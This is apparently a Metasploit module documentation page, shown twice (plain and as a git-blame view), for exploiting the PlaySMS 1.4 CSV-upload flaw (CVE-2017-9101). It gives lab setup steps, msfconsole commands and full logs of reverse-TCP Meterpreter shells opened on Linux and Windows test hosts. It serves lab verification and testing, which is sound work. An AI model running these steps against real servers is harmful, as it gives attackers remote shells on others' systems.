documentation/modules/exploit/multi/http/playsms_uploadcsv_exec.md

## Description
A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42044/) and [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101)

## Verification Steps
Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

### Vulnerable Application Installation Setup.
 1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/playsms_uploadcsv_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi SecreTSMSgatwayLogin`
 7. Do: `set username touhid`
 8. Do: `set password diana`
 9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.

## Scenarios
### Playsms on Ubuntu Linux
```
msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7
rhost => 10.22.1.7
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.7:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3 
lhost => 10.22.1.3
msf exploit(multi/http/playsms_uploadcsv_exec) > run 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.7
[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530

meterpreter > sysinfo 
Computer    : Dina
OS          : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > 

```
### Playsms on Windows 7
```
msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9
rhost => 10.22.1.9 
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web
targeturi => web
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.9:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username test
username => test
msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit
password => metasploit
msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c
[*] Trying to Login ......
[+] Authentication successful: test:metasploit
[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.9
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530

meterpreter > sysinfo 
Computer    : TOUHID-PC
OS          : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter > 

```
added doc 2018-05-07 18:50:53 +05:30			`## Description`
			`A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42044/) and [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101)`

module options to options 2020-01-16 10:49:22 -05:00			`## Verification Steps`
added doc 2018-05-07 18:50:53 +05:30			`Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)`

Fix indentation, documentation update 2018-05-07 09:22:21 -05:00			`### Vulnerable Application Installation Setup.`
			1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
			2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
			3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
			4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
			5. Change Owner : `chown -R www-data:www-data /var/www/html/`
			`6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.`
			`7. Now Visit : http://localhost/`
added doc 2018-05-07 18:50:53 +05:30
			`## Verification Steps`

Fix indentation, documentation update 2018-05-07 09:22:21 -05:00			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/http/playsms_uploadcsv_exec`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `set targeturi SecreTSMSgatwayLogin`
			7. Do: `set username touhid`
			8. Do: `set password diana`
			9. Do: `check`
added doc 2018-05-07 18:50:53 +05:30			```
			`[*] 10.22.1.10:80 The target appears to be vulnerable.`
			```
Fix indentation, documentation update 2018-05-07 09:22:21 -05:00			10. Do: `set lport <port>`
			11. Do: `set lhost <ip>`
			12. Do: `exploit`
			`13. You should get a shell.`
added doc 2018-05-07 18:50:53 +05:30
			`## Scenarios`
			`### Playsms on Ubuntu Linux`
			```
			`msf > use exploit/multi/http/playsms_uploadcsv_exec`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7`
			`rhost => 10.22.1.7`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin`
			`targeturi => SecreTSMSgatwayLogin`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > check`
			`[*] 10.22.1.7:80 The target appears to be vulnerable.`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid`
			`username => touhid`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana`
			`password => diana`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3`
			`lhost => 10.22.1.3`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > run`

			`[*] Started reverse TCP handler on 10.22.1.3:4444`
			`[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef`
			`[*] Trying to Login ......`
			`[+] Authentication successful: touhid:diana`
			`[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6`
			`[*] Trying to upload malicious CSV file ....`
			`[*] Sending stage (37543 bytes) to 10.22.1.7`
			`[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530`

			`meterpreter > sysinfo`
			`Computer : Dina`
			`OS : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686`
			`Meterpreter : php/linux`
			`meterpreter >`

			```
			`### Playsms on Windows 7`
			```
			`msf > use exploit/multi/http/playsms_uploadcsv_exec`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9`
			`rhost => 10.22.1.9`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web`
			`targeturi => web`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > check`
			`[*] 10.22.1.9:80 The target appears to be vulnerable.`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set username test`
			`username => test`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit`
			`password => metasploit`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true`
			`verbose => true`
			`msf exploit(multi/http/playsms_uploadcsv_exec) > exploit`

			`[*] Started reverse TCP handler on 10.22.1.3:4444`
			`[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c`
			`[*] Trying to Login ......`
			`[+] Authentication successful: test:metasploit`
			`[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904`
			`[*] Trying to upload malicious CSV file ....`
			`[*] Sending stage (37543 bytes) to 10.22.1.9`
			`[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530`

			`meterpreter > sysinfo`
			`Computer : TOUHID-PC`
			`OS : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586`
			`Meterpreter : php/windows`
			`meterpreter >`

			```